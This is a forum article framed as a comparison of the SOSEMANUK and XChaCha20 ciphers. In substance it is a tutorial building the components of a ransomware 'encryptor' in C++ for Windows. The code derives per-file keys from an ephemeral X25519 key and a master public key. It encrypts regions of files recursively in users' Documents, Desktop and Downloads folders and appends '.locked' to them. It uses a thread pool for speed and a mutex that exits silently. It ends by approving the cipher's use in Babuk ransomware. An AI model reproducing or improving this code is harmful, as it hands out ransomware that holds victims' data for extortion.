Статья SOSEMANUK: A Viable Alternative to ChaCha20?

Remio · 03.01.2026

A X25519 + SOSEMANUK-POLY1305 Test + Cleaning Up the File Encryptor:

Github Links To Projects:

Improved X25519+ChaCha20-POLY1205 with New Features: https://github.com/notRemyQ/X25519-ChaCha20-POLY1205-File-Encryptor
SOSEMANUK Proof-of-Concept Encryptor: https://github.com/notRemyQ/SOSEMANUK-Proof-of-Concept

To quickly recap the first article we walked through an X25519–HKDF–XChaCha20–Poly1305 file encryption scheme and examined how the encryptor and decryptor exchange ephemeral keys, derive per-file symmetric keys, and authenticate everything. That design worked well. In this article, we’re going to do a few things: implement a thread pool and a mutex, clean up the codebase, properly implement the CRC32 checksum and then see what happens when we drop in and swap out a new cipher into the same framework. We’ll keep the same key agreement, the same HKDF, and the same MAC, and evaluate whether SOSEMANUK is a practical alternative to XChaCha20 for our file-encryption system.

Before we can understand the cipher in question we to take a look at two different ciphers:

SNOW 2.0: a stream cipher built around an linear-feedback shift register (LFSR) for state evolution and an finite-state machine (FSM) for nonlinear mixing, giving it strong theoretical grounding and high throughput.
SERPENT: an AES‑finalist block cipher known for its conservative design and highly analyzed S‑boxes, which provide strong nonlinear confusion.

SOSEMANUK essentially merges SNOW’s LFSR‑FSM structure with SERPENT’s S‑boxes to create a fast and software‑optimized stream cipher. It improves on SNOW with faster initialization and better overall performance, supports 128–256‑bit keys (with 128‑bit security), and uses a 128‑bit IV. It works by:

Initializing the LFSR with the key and IV
Clocking the LFSR to build the internal state
Applying SERPENT‑derived S‑boxes for nonlinearity
Then mixing everything through the FSM to generate the keystream

This produces a keystream in 80byte (640-bit) chunks, achieving speeds of around 4–7 cycles/byte on modern x86 processors making it comparable to ChaCha20 (and even sometimes faster I find). It's a bit more complex however and lacks the simplicity and built in AEAD pairing we saw in the previous tutorial that helped ChaCha20‑Poly1305 become more standard. To compare the two we can tabulate their main features:

SOSEMANUK vs ChaCha20/XChaCha20

Feature	XChaCha20	SOSEMANUK
Design Basis:	Very simple ARX (Add-Rotate-XOR)	LFSR + FSM + SERPENT S-boxes
Key Size:	256 bits	128–256 bits
IV/Nonce Size:	192 bits (24 bytes)	128 bits (16 bytes)
Performance:	Roughly 4 cycles/byte	Around 4–7 cycles/byte
Security Analysis:	Extensive (Salsa20 family)	Extensive (eSTREAM finalist)
Best Use Case:	TLS, VPNs, embedded systems, wide range	High-throughput bulk encryption, niche projects

Both are eSTREAM finalists with no known practical attacks. SOSEMANUK excels in high-throughput software encryption, while ChaCha20 is slightly better for constrained devices..

Can We Use SOSEMANUK for Our File Encryption System?

SOSEMANUK has over fifteen years of public analysis with no practical breaks, delivers excellent throughput on large sequential data, and exposes a clean “key + IV > keystream” interface that fits streaming workloads well. It also integrates smoothly with our X25519 > HKDF > Poly1305 design, since HKDF can supply a fresh symmetric key, we can derive a 128‑bit IV per file or chunk, and Poly1305 handles authentication without conflicting with the cipher’s structure or assumptions, making SOSEMANUK a seemingly viable option for our file‑encryption system given the eSTREAM portfolio was also deliberately designed for interchangeability. All software-profile ciphers share a common structure:

C:

// Generic Stream Cipher API
typedef struct cipher_context {
    // Internal state (implementation-specific)
} cipher_context;

// Initialize with key
void cipher_keysetup(cipher_context* ctx, const uint8_t* key, size_t key_len);

// Set IV/nonce
void cipher_ivsetup(cipher_context* ctx, const uint8_t* iv, size_t iv_len);

// Generate keystream and XOR with data
void cipher_encrypt_bytes(cipher_context* ctx,
                          const uint8_t* plaintext,
                          uint8_t* ciphertext,
                          size_t length);

This standardized interface means you can swap ciphers with minimal code changes regardless of which cipher you use because the core cryptographic construction remains identical (in theory). The cipher just becomes a swappable component in our encryption system.

However, much like the other eSTREAM ciphers, we don’t need the actual eSTREAM wrapper files to use SOSEMANUK. All of the project finalists (Salsa20 with ChaCha20 as a later variant, HC‑128, Rabbit, and SOSEMANUK ) ship with their own APIs that mirror the eSTREAM structure, but are designed to be used inline without the full ECRYPT framework. The standardized “key > IV > keystream” model is conceptual and the implementations themselves are self‑contained and can be embedded directly into our system without pulling in any external eSTREAM headers. For a stream cipher to work in our X25519-HKDF-Poly1305 construction, it needs only:

Synchronoss stream operations: to produce a keystream that's XORed with plaintext.
Deterministic keystream: The same (key, IV) pair always produces the same keystream. This is critical for decryption.
Clean nonce/IV: The IV must be either: random (if it's large enough to avoid collisions) or a counter (if guaranteed unique per key)
No built in authentication: The cipher just encrypts. Authentication still comes from Poly1305 or some other authentication mechanism.
Arbitrary length plaintext: Can encrypt any number of bytes without padding schemes.

All eSTREAM finalists meet these requirements, which is why they work seamlessly with AEAD constructions like Encrypt-then-MAC which is good because our file encryptor has clearly separated concerns:

C:

// Layer 1: the key Agreement (X25519)
curve25519_donna(shared_secret, ephemeral_private, master_public);

// Layer 2: Derive the keys (HKDF-SHA512)
HKDF_SHA512(salt, shared_secret, info, okm, 64);
memcpy(cipher_key, okm, 32);      // For stream cipher
memcpy(auth_key, okm + 32, 32);  // For Poly1305

// Layer 3: Encryption (swappable!)
cipher_keysetup(&ctx, cipher_key, 32);
cipher_ivsetup(&ctx, iv, iv_len);
cipher_encrypt_bytes(&ctx, plaintext, ciphertext, length);

// Layer 4: Authentication (Poly1305)
poly1305_init(&mac_ctx, auth_key);
poly1305_update(&mac_ctx, ciphertext, length);
poly1305_finish(&mac_ctx, tag);

Because each layer is independent X25519 still provides forward secrecy, HKDF still produces uniform key material, and Poly1305 still authenticates ciphertext. The only component that changes is the Layer‑3 stream cipher. This modularity lets us swap XChaCha20 for SOSEMANUK or any other eSTREAM cipher without touching key agreement, key derivation or authentication. all the eSTREAM ciphers share the same core security properties making their security levels are effectively equivalent so really the decision comes down to performance and engineering fit. This ability to switch easily between cryptographic primitives is known as algorithm agility. SOSEMANUK delivers excellent throughput for bulk file encryption while maintaining the same security level as XChaCha20.

Even though swapping XChaCha20 for SOSEMANUK requires minimal changes, as with all tasks in life there is still some work involved and therefore a few things to consider:

The nonce size: 24 bytes (XChaCha20) to 16 bytes (SOSEMANUK)
We're moving from a single context to two contexts (key + run)
We need to obviously swap the function names: xchacha_* to sosemanuk_*
We need up update the metadata

So let's walk through these modifications step by step. Firstly the metadata structure shrinks by 8 bytes due to the smaller IV. Note that this smaller IV is perfectly safe as16 bytes (128 bits) provides 2^128 possible values, far beyond what's needed for random nonce generation. Even encrypting a billion files per second for a century wouldn't exhaust this space. You’d need to encrypt more files than ten times the number of grains of sand on Earth to even approach a collision, and you still wouldn’t get there.

C++:

// Our previous 89 byte XChaCha20 implementation:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;   // 4 bytes
    uint8_t ephemeral_public[32];  // 32 bytes
    uint8_t nonce[24];  // 24 bytes (XChaCha20)
    uint8_t encryption_mode;  // 1 byte
    uint64_t original_size;    // 8 bytes
    uint8_t poly1305_tag[16];  // 16 bytes
    uint32_t metadata_checksum; //4 bytes
};
#pragma pack(pop)

// to 81 bytes:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;     // 4 bytes
    uint8_t ephemeral_public[32]; // 32 bytes
    uint8_t iv[16];      // 16 bytes (SOSEMANUK)
    uint8_t encryption_mode; // 1 byte
    uint64_t original_size; // 8 bytes
    uint8_t poly1305_tag[16];  // 16 bytes
    uint32_t metadata_checksum; // 4 bytes
};
#pragma pack(pop)

const uint32_t CRYPTO_VERSION = 0x00030001; // v3.1 (SOSEMANUK) // ... I suppose we should update the version also

Encryption / Decryption Function Changes
The only real change here is that the core encryption logic shifts from XChaCha20’s single‑context to SOSEMANUK’s two‑context model: XChaCha20 uses one unified state for key, nonce, counter, and block generation, while SOSEMANUK maintains an LFSR state and a nonlinear filter state that advance together. Basically the internal pipeline is split into two coordinated parts, but the external interface remains the same (key > IV > keystream flow). In practice, the two‑context design stays fully encapsulated inside the cipher’s state struct so integration is no more complex. This structured pipeline is part of what gives SOSEMANUK its strong throughput.

C++:

//  Initialize the context
// XChaCha20: single context
XChaCha_ctx ctx;
xchacha_keysetup(&ctx, key, nonce);

// SOSEMANUK's two contexts (key + run)
sosemanuk_key_context key_ctx;
sosemanuk_run_context run_ctx;
sosemanuk_schedule(&key_ctx, key, 32);       // Setup key schedule
sosemanuk_init(&run_ctx, &key_ctx, iv, 16);  // Initialize with IV

// Encrypt each region
for (int i = 0; i < regionCount; i++) {

    // XChaCha20
    xchacha_encrypt_bytes(&ctx, Buffer, Buffer, chunkSize);
    // SOSEMANUK
    sosemanuk_encrypt(&run_ctx, Buffer, Buffer, chunkSize);
}

// XChaCha20 clean up
SecureZeroMemory(&ctx, sizeof(ctx));
// SOSEMANUK cleanup
SecureZeroMemory(&key_ctx, sizeof(key_ctx));
SecureZeroMemory(&run_ctx, sizeof(run_ctx));

You can see the workflow remains the same. The only differences are the cipher-specific setup, keystream generation, and context cleanup. It should highlight how eSTREAM-style stream ciphers like SOSEMANUK can be swapped into an existing system with minimal changes, letting us maintain the same key management, file structure, and authentication layers while choosing the cipher that we find works best.

Decryption again simply mirrors these encryption changes:

C++:

bool decryptFile(const wchar_t* filepath) {
    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                              OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }
 
    // The way we read and validate metadata from end of file (unchanged)
    LARGE_INTEGER fileSizeLI;
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG totalSize = fileSizeLI.QuadPart;
 
    FileMetadata meta;
    LARGE_INTEGER metaOffset;
    metaOffset.QuadPart = totalSize - sizeof(FileMetadata);
    SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);
 
    DWORD bytesRead;
    ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);
 
    // Validate
    if (!ValidateMetadata(&meta, totalSize)) {
        CloseHandle(hFile);
        return false;
    }
 
    // X25519 key agreement remains unchanged (uint8_t shared_secret...)
 
    // Derive keys (unchanged except version string)
    uint8_t sosemanuk_key[32];
    uint8_t poly_key[32];
    uint8_t okm[64];
 
    HKDF_SHA512((const uint8_t*)"filecrypto-v3.1", 15,
                shared_secret, 32,
                (const uint8_t*)"key-derivation", 14,
                okm, 64);
 
    memcpy(sosemanuk_key, okm, 32);
    memcpy(poly_key, okm + 32, 32);
    SecureZeroMemory(okm, 64);
 
    // Verify Poly1305 MAC BEFORE decryption and calculating the regions to encrypt remains the same
    if (!VerifyPoly1305MAC(hFile, meta.original_size, poly_key, meta.poly1305_tag)) {
        CloseHandle(hFile);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(sosemanuk_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }
 
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(meta.original_size, (EncryptionMode)meta.encryption_mode,
                    regions, &regionCount);
 
    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    BOOL success = DecryptFileRegions(hFile, buffer, sosemanuk_key, meta.iv,
                                      regions, regionCount);  // Decrypt SOSEMANUK
 
    if (!success) {
        free(buffer);
        CloseHandle(hFile);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(sosemanuk_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }
 
    // Truncate file to original size (unchanged)
    LARGE_INTEGER newSize;
    newSize.QuadPart = meta.original_size;
    SetFilePointerEx(hFile, newSize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);
    CloseHandle(hFile);
 
    // Remove .locked extension (unchanged)
    wchar_t finalPath[MAX_PATH];
    wcscpy_s(finalPath, MAX_PATH, filepath);
    size_t len = wcslen(finalPath);
    if (len > 7 && _wcsicmp(finalPath + len - 7, L".locked") == 0) {
        finalPath[len - 7] = L'\0';
        MoveFileExW(filepath, finalPath, MOVEFILE_REPLACE_EXISTING);
    }
 
    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(sosemanuk_key, 32);
    SecureZeroMemory(poly_key, 32);
    free(buffer);
 
    return true;
}

The DecryptFileRegions function is nearly identical to encryption, except SOSEMANUK uses the same function for both operations;

C++:

BOOL DecryptFileRegions(HANDLE hFile, LPBYTE Buffer,
                        uint8_t* key, uint8_t* iv,
                        EncryptionRegion* regions, int regionCount) {
 
    sosemanuk_key_context key_ctx;
    sosemanuk_run_context run_ctx;
    sosemanuk_schedule(&key_ctx, key, 32);
    sosemanuk_init(&run_ctx, &key_ctx, iv, 16);
 
    for (int i = 0; i < regionCount; i++) {
        if (!DecryptRegion(hFile, Buffer, &run_ctx,
                          regions.start, regions.size)) {
            SecureZeroMemory(&key_ctx, sizeof(key_ctx));
            SecureZeroMemory(&run_ctx, sizeof(run_ctx));
            return FALSE;
        }
    }
 
    SecureZeroMemory(&key_ctx, sizeof(key_ctx));
    SecureZeroMemory(&run_ctx, sizeof(run_ctx));
    return TRUE;
}

BOOL DecryptRegion(HANDLE hFile, LPBYTE Buffer, sosemanuk_run_context* run_ctx,
                  LONGLONG startPos, LONGLONG regionSize) {
    if (regionSize <= 0) return FALSE;
 
    LARGE_INTEGER offset;
    offset.QuadPart = startPos;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
 
    LONGLONG totalProcessed = 0;
    while (totalProcessed < regionSize) {
        DWORD chunkSize = (regionSize - totalProcessed > BufferSize) ?
                          BufferSize : (DWORD)(regionSize - totalProcessed);
 
        ReadFullData(hFile, Buffer, chunkSize);
 
        // Same function as encryption
        sosemanuk_encrypt(run_ctx, Buffer, Buffer, chunkSize);
 
        offset.QuadPart = startPos + totalProcessed;
        SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
        WriteFullData(hFile, Buffer, chunkSize);
 
        totalProcessed += chunkSize;
    }
 
    return TRUE;
}

Adding a Thread Pool
Well as we can see swapping the cipher is quite straightforward, to get an idea of its true speed Introducing a thread pool allows multiple files to be processed in parallel, significantly increasing total throughput. This parallelism becomes especially valuable when encrypting large numbers of files.

C++:

// ThreadPool.h: header-only thread pool for file processing
class ThreadPool {
private:
    struct WorkItem {
        wchar_t filepath[MAX_PATH];
        WorkItem* next;
    };
 
    HANDLE* threads;
    DWORD threadCount;
    CRITICAL_SECTION queueLock;
    HANDLE workAvailable;
    HANDLE shutdownEvent;
    WorkItem* queueHead;
    WorkItem* queueTail;
    bool shuttingDown;
    void* context;  // For passing HCRYPTPROV or other data
 
    static DWORD WINAPI WorkerThread(LPVOID param) {
        ThreadPool* pool = (ThreadPool*)param;
        return pool->WorkerThreadProc();
    }
 
    DWORD WorkerThreadProc() {
        while (true) {
            HANDLE events[2] = { workAvailable, shutdownEvent };
            DWORD result = WaitForMultipleObjects(2, events, FALSE, INFINITE);
 
            if (result == WAIT_OBJECT_0 + 1) {
                break;  // Shutdown event
            }
 
            WorkItem* item = NULL;
 
            EnterCriticalSection(&queueLock);
            if (queueHead != NULL) {
                item = queueHead;
                queueHead = item->next;
                if (queueHead == NULL) {
                    queueTail = NULL;
                }
            }
            LeaveCriticalSection(&queueLock);
 
            if (item != NULL) {
                ProcessFile(item->filepath);  // Virtual function
                delete item;
            }
        }
        return 0;
    }
 
protected:
    // Override this in the derived classes
    virtual void ProcessFile(const wchar_t* filepath) = 0;
 
public:
    ThreadPool(DWORD numThreads, void* ctx = NULL)
        : context(ctx), shuttingDown(false) {
 
        // Autodetect thread count if not specified
        threadCount = numThreads;
        if (threadCount == 0) {
            SYSTEM_INFO sysInfo;
            GetSystemInfo(&sysInfo);
            threadCount = sysInfo.dwNumberOfProcessors * 2;
        }
 
        InitializeCriticalSection(&queueLock);
        workAvailable = CreateEvent(NULL, FALSE, FALSE, NULL);
        shutdownEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
        queueHead = NULL;
        queueTail = NULL;
 
        // Create worker threads
        threads = new HANDLE[threadCount];
        for (DWORD i = 0; i < threadCount; i++) {
            threads = CreateThread(NULL, 0, WorkerThread, this, 0, NULL);
        }
    }
 
    virtual ~ThreadPool() {
        Shutdown();
        DeleteCriticalSection(&queueLock);
        CloseHandle(workAvailable);
        CloseHandle(shutdownEvent);
        delete[] threads;
    }

    void AddWork(const wchar_t* filepath) {
        if (shuttingDown) return;
 
        WorkItem* item = new WorkItem;
        wcscpy_s(item->filepath, MAX_PATH, filepath);
        item->next = NULL;
 
        EnterCriticalSection(&queueLock);
        if (queueTail == NULL) {
            queueHead = queueTail = item;
        } else {
            queueTail->next = item;
            queueTail = item;
        }
        LeaveCriticalSection(&queueLock);
        SetEvent(workAvailable);
    }
 
    void Shutdown() {
        if (shuttingDown) return;
        shuttingDown = true;
 
        SetEvent(shutdownEvent);
        WaitForMultipleObjects(threadCount, threads, TRUE, INFINITE);
 
        for (DWORD i = 0; i < threadCount; i++) {
            CloseHandle(threads);
        }
        // Clean up
        EnterCriticalSection(&queueLock);
        while (queueHead != NULL) {
            WorkItem* item = queueHead;
            queueHead = item->next;
            delete item;
        }
        queueTail = NULL;
        LeaveCriticalSection(&queueLock);
    }
    void* GetContext() { return context; }
};

We can then create a specialized thread pool instance inside each stub to handle encryption and decryption separately. Remember that stub is separate program so we just include ThreadPool.h and runs its own pool independently.

C++:

// thread pool for the encryptor
class EncryptionThreadPool : public ThreadPool {
protected:
    void ProcessFile(const wchar_t* filepath) override {
        HCRYPTPROV hProv = (HCRYPTPROV)GetContext();
        encryptFile(filepath, hProv);
    }
 
public:
    EncryptionThreadPool(DWORD numThreads, HCRYPTPROV hProv)
        : ThreadPool(numThreads, (void*)hProv) {
    }
};

// and dec threapool
class DecryptionThreadPool : public ThreadPool {
protected:
    void ProcessFile(const wchar_t* filepath) override {
        decryptFile(filepath);
    }
 
public:
    DecryptionThreadPool(DWORD numThreads)
        : ThreadPool(numThreads, NULL) {
    }
};

We can access it in the main program by:

C++:

int WINAPI wWinMain(...) {
    HCRYPTPROV hProv;
    CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
 
    // Create thread pool (0 = auto-detect thread count)
    EncryptionThreadPool* pool = new EncryptionThreadPool(0, hProv);
 
    // Recursively scan directories and add files to queue
    ProcessDirectoryThreaded(L"C:\\Users\\User\\Documents", pool);
    ProcessDirectoryThreaded(L"C:\\Users\\User\\Desktop", pool);
 
    // Wait for all work to complete
    delete pool;  // Destructor calls Shutdown() and waits
 
    CryptReleaseContext(hProv, 0);
    return 0;
}

The thread pool automatically scales to the number of CPU cores, dramatically improving performance on systems with many files.

Adding a Mutex
Great, we have our super fast encryptor... So fast even that accidently running the encryptor multiple times and not realising it, or running two instances simultaneously would be catastrophic. Files could become unrecoverable. We prevent this with a named mutex:

C++:

// Unique mutex name (change for each build)
#define MUTEX_NAME L"Global\\{E7A3F9C2-4B1D-4E8F-9A2C-6D5E8F1B3C4A}"

int WINAPI wWinMain(etc...) {
 
    HANDLE hMutex = CreateMutexW(NULL, TRUE, MUTEX_NAME);
 
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        // Another instance is already running - exit silently
        if (hMutex) CloseHandle(hMutex);
        return 0;
    }
 
    // do encryption...
 
    // Release mutex before exit
    if (hMutex) {
        ReleaseMutex(hMutex);
        CloseHandle(hMutex);
    }
 
    return 0;
}

It works by having the first instance create a mutex and continue running, while any subsequent instance that tries to create the same mutex receives ERROR_ALREADY_EXISTS and immediately exits, ensuring only one instance runs until the mutex is released. We use the "Global\\" prefix to ensure its system-wide across all user sessions.

Powershell:

Код:

// PowerShell: [guid]::NewGuid()

Implement a proper CRC32
We can just use the same metadata structure that includes a CRC32 checksum field to detect corruption or tampering with the file header before attempting decryption in place of the XOR-shift loop.

C++:

// Original placeholder
uint32_t crc = 0;
for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
    crc = (crc << 8) ^ ((uint8_t*)&meta)[i];
}
meta.metadata_checksum = crc;

This is pretty useless for detecting any corruption patterns. For production use, we need a proper CRC32 implementation. Here we just use Stephan Brumme's optimized CRC32 library. It's a classic implementation that uses the standard zlib polynomial (0xEDB88320) and employs Slicing-by-16 lookup tables for excellent performance (achieving around 1-2 cycles per byte on modern CPUs). It's well-tested, widely used, and provides multiple algorithm variants from simple bitwise calculation to highly optimized table-based approaches. We use crc32_fast(), which automatically selects the best algorithm based on available features:

C++:

// Proper CRC32 implementation
#include "Crc32.h"

// Calculate checksum over metadata (excluding checksum field itself)
meta.metadata_checksum = crc32_fast(&meta, sizeof(FileMetadata) - sizeof(uint32_t), 0);

// again during decryption validation is straightfoward
BOOL ValidateMetadata(const FileMetadata* meta, LONGLONG encryptedFileSize) {
    // Do other validation checks ...
 
    // Verify CRC32 checksum
    uint32_t calculated_crc = crc32_fast(meta, sizeof(FileMetadata) - sizeof(uint32_t), 0);
    if (calculated_crc != meta->metadata_checksum) return FALSE;
 
    return TRUE;
}

The CRC32 checksum covers all metadata fields: version number, ephemeral public key, IV/nonce, encryption mode, original file size, and Poly1305 tag. This allows us to detect any modification to these critical fields before performing expensive cryptographic operations. While Poly1305 provides cryptographic authentication of the file contents (detecting malicious tampering), the CRC32 serves as a fast preliminary integrity check on metadata structure (detecting accidental corruption), allowing us to fail early on corrupted headers without unnecessary decryption attempts. To emphasis further: CRC32 is not a cryptographic primitive and cannot prevent malicious tampering. It's designed to detect random corruption from disk errors, transmission issues, or storage failures. Poly1305, on the other hand, provides cryptographic authentication that detects intentional modification. Together, CRC32 catches honest errors , while Poly1305 catches tampering.

A common misconception is that Poly1305 is somehow tied to ChaCha20 because of "ChaCha20-Poly1305" AEAD. In reality, Poly1305 is completely algorithm-agnostic.

Our new system uses the same Encrypt-then-mac construction described in detail in the XChaCha20 article. To recap we derive two independent keys from HKDF, use one for SOSEMANUK encryption and the other for Poly1305 authentication:

C++:

// 1: Derive TWO independent keys from HKDF
uint8_t okm[64];
HKDF_SHA512(salt, shared_secret, info, okm, 64);

uint8_t cipher_key[32];  // first 32 bytes  > SOSEMANUK
uint8_t mac_key[32]; // second 32 bytes > Poly1305

memcpy(cipher_key, okm, 32);
memcpy(mac_key, okm + 32, 32);

// 2 Encrypt usingSOSEMANUK
sosemanuk_key_context key_ctx;
sosemanuk_run_context run_ctx;

sosemanuk_schedule(&key_ctx, cipher_key, 32);
sosemanuk_init(&run_ctx, &key_ctx, iv, 16);
sosemanuk_encrypt(&run_ctx, plaintext, ciphertext, length);

// 3: Compute Poly1305 MAC over ciphertext
poly1305_context mac_ctx;

poly1305_init(&mac_ctx, mac_key);
poly1305_update(&mac_ctx, ciphertext, length);
poly1305_finish(&mac_ctx, tag);   // Produces 16-byte tag

// 4 Store tag in metadata
memcpy(meta.poly1305_tag, tag, 16);

Now that we’ve established a secure environment and generated the necessary cryptographic keys and primitives we have a solid foundation for exploring eSTREAM ciphers without compromising security. Because our encryptor cleanly separates concerns:

Код:

// Layer 1: Key agreement
shared_secret = X25519(ephemeral_private, master_public)


// Layer 2: Derive keys
(cipher_key, mac_key) = HKDF(shared_secret)
// Ensures key independence

// Security Layer 3: encryption
ciphertext = SOSEMANUK(cipher_key, iv, plaintext)

//Layer 4: authentication

Only the layer 3 changes when swapping ciphers. Layers 1, 2, and 4 remain identical, maintaining the same security guarantees (as long as the replacement cipher has a secure pseudorandom function, the cipher has no known practical attacks and uses proper key and IV sizes) the overall construction remains secure. SOSEMANUK meets all these requirements and provides:

A high Throughput
parallel file processing
Single Instance Protection: Mutex
Dynamic encryption
Robust Validation: Multiple layers (CRC, MAC, metadata checks)
A modular codebase

Being able to transition XChaCha20 to SOSEMANUK if anything demonstrates the modularity of the eSTREAM finalists. Whether you choose ChaCha20, XChaCha20, SOSEMANUK, Salsa20, HC-128, or any other eSTREAM finalist, the construction remains secure. The cipher is just a swappable component in a larger security framework. In contrast, traditional AEAD constructions like AES‑GCM are less flexible in modular, software oriented systems.

AES‑GCM is secure and now pretty much universally deployed, but it isn’t always ideal for a software‑oriented crypto system. It depends heavily on hardware acceleration, and without AES‑NI or ARMv8 crypto extensions it’s often slower than modern software‑optimized stream ciphers. GCM is also extremely sensitive to nonce reuse, where even a single repeated nonce under the same key can break confidentiality and integrity. Stream ciphers like SOSEMANUK or XChaCha20 are easier to use safely in pure software environments and degrade less catastrophically under misuse. AES‑GCM also fixes encryption and authentication into a single AEAD mode, which limits the algorithm agility our design aims for. Finally constant‑time AES implementations are harder to get right in software whereas ARX and LFSR/FSM stream ciphers naturally avoid many timing‑side‑channel issues.

Benchmarking
As mentioned earlier, I found the scheme can outperform the XChaCha variant in some cases. If you want to measure that yourself, the thread pool already supports it: pass in a metrics object and it records results after each file. For reference, SOSEMANUK’s own speed test uses a minimal timing loop:

C:

// sosemanuk.c basic timing structure
clock_t orig, end;
unsigned long speed_counter;

orig = clock();
sum = sosemanuk_internal(&rc, speed_counter);
end = clock();

double elapsed = (double)(end - orig) / CLOCKS_PER_SEC;
double throughput = (speed_counter * 20.0 * 4.0) / elapsed;
printf("32-bit words per second: %.0f\n", throughput / 4.0);

This measures raw cipher speed only. It ignores disk I/O, key setup, and thread scheduling, so it’s not representative of real file encryption. For practical benchmarking, QueryPerformanceCounter gives reliable high‑resolution timing. The class below tracks bytes, file count, and elapsed time:

C++:

class BenchmarkMetrics {
private:
LARGE_INTEGER frequency, startTime;
ULONGLONG totalBytes;
DWORD totalFiles;
CRITICAL_SECTION lock;

public:
BenchmarkMetrics() : totalBytes(0), totalFiles(0) {
QueryPerformanceFrequency(&frequency);
InitializeCriticalSection(&lock);
}
~BenchmarkMetrics() { DeleteCriticalSection(&lock); }

void Start() { QueryPerformanceCounter(&startTime); }

void RecordFile(ULONGLONG size) {
EnterCriticalSection(&lock);
totalFiles++;
totalBytes += size;
LeaveCriticalSection(&lock);
}

void PrintResults() {
LARGE_INTEGER end;
QueryPerformanceCounter(&end);

double elapsed = (double)(end.QuadPart - startTime.QuadPart)
/ frequency.QuadPart;

if (elapsed < 0.1) {
printf("Too fast: no meaningful result\n");
return;
}

double mb = totalBytes / (1024.0 * 1024.0);
printf("Benchmark results:\n");
printf("Total files:  %lu\n", totalFiles);
printf("Total data: %.2f MB\n", mb);
printf("Elapsed time: %.4f seconds\n", elapsed);
printf("Throughput: %.2f MB/s\n", mb / elapsed);
printf("Files/second:  %.2f\n", totalFiles / elapsed);
}
};

The thread pool accepts an optional metrics object and updates it after each file:

C++:

class ThreadPool {
protected:
void* context;
BenchmarkMetrics* metrics;
virtual void ProcessFile(const wchar_t* filepath) = 0;

public:
ThreadPool(DWORD threads, void* ctx = NULL, BenchmarkMetrics* m = NULL)
: context(ctx), metrics(m), shuttingDown(false) {}
//...
};

// encryption pool:
class EncryptionThreadPool : public ThreadPool {
protected:
void ProcessFile(const wchar_t* filepath) override {
HCRYPTPROV hProv = (HCRYPTPROV)GetContext();

LARGE_INTEGER size = {0};
HANDLE h = CreateFileW(filepath, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE) {
GetFileSizeEx(h, &size);
CloseHandle(h);
}

if (encryptFile(filepath, hProv) && metrics)
metrics->RecordFile(size.QuadPart);
}
};

Running a Benchmark

C++:

BenchmarkMetrics metrics;
EncryptionThreadPool* pool = new EncryptionThreadPool(0, hProv, &metrics);

metrics.Start();

ProcessDirectoryThreaded(L"C:\\Users\\User\\Documents", pool);
ProcessDirectoryThreaded(L"C:\\Users\\User\\Desktop", pool);
ProcessDirectoryThreaded(L"C:\\Users\\User\\Downloads", pool);

delete pool;
metrics.PrintResults();

SOSEMANUK typically gets 4 to 7 cycles/byte on x32, with me getting around 7/8 on x64 win10/11. This throughput is lower on x32 because the 32bit arithmetic maps directly to the CPU. On x64 it runs slightly slower because it cannot exploit 64bit parallelism and some mixing and shuffling means it becomes slightly less efficient.

C++:

printf("Testing XChaCha20-Poly1305...\n");
BenchmarkMetrics x;
x.Start();
// ...
x.PrintResults();

printf("\nTesting SOSEMANUK-Poly1305...\n");
BenchmarkMetrics s;
s.Start();
// ...
s.PrintResults();

They usually fall within around10–20% of each other depending on CPU and environment.

...So Is It a Viable Algorithm? Yes and no, here it doesn't really make much sense. Although it does as mentioned, have currently no practical breaks and deliver excellent throughput ChaCha20 is a better choice. Its usually faster, simpler to implement correctly, highly resistant to attacks, as well as now being somewhat standardised. SOSEMANUK on the other hand is a more complex cipher, it's old and and less battle-tested. This makes it it a less practical option despite its theoretical suitability. It is however still used in real software libraries (Crypto++) and some niche applications for custom encryption tooling or research projects. It also appeared in the Babuk ransomware’s ESXi version which makes sense as it's optimized for high throughput on large sequential data, making it ideal for VM disks.

Github Links To Projects:

Improved X25519+ChaCha20-POLY1205 with New Features: https://github.com/notRemyQ/X25519-ChaCha20-POLY1205-File-Encryptor
SOSEMANUK Proof-of-Concept Encryptor: https://github.com/notRemyQ/SOSEMANUK-Proof-of-Concept

More Further Reading;

Berbain, C., et al., SOSEMANUK: A Fast Software-Oriented Stream Cipher, https://cr.yp.to/streamciphers/sosemanuk/desc.pdf
Bugbee, L., SOSEMANUK, Seanet, https://www.seanet.com/~bugbee/crypto/sosemanuk/
FPGA Implementation of Stream Cipher SOSEMANUK, IEEE Xplore, https://ieeexplore.ieee.org/document/10062861
GitHub – cchcc/SOSEMANUK: stream cipher, https://github.com/cchcc/SOSEMANUK/tree/master
GitHub – agl. “curve25519-donna: Portable C Implementation of Curve25519.” https://github.com/agl/curve25519-donna
Chuong Dong.“Babuk Ransomware v3 – Technical Analysis and Reverse Engineering Notes.” https://www.chuongdong.com/reverse engineering/2021/01/16/BabukRansomware-v3/

Статья SOSEMANUK: A Viable Alternative to ChaCha20?

Remio

HDD-drive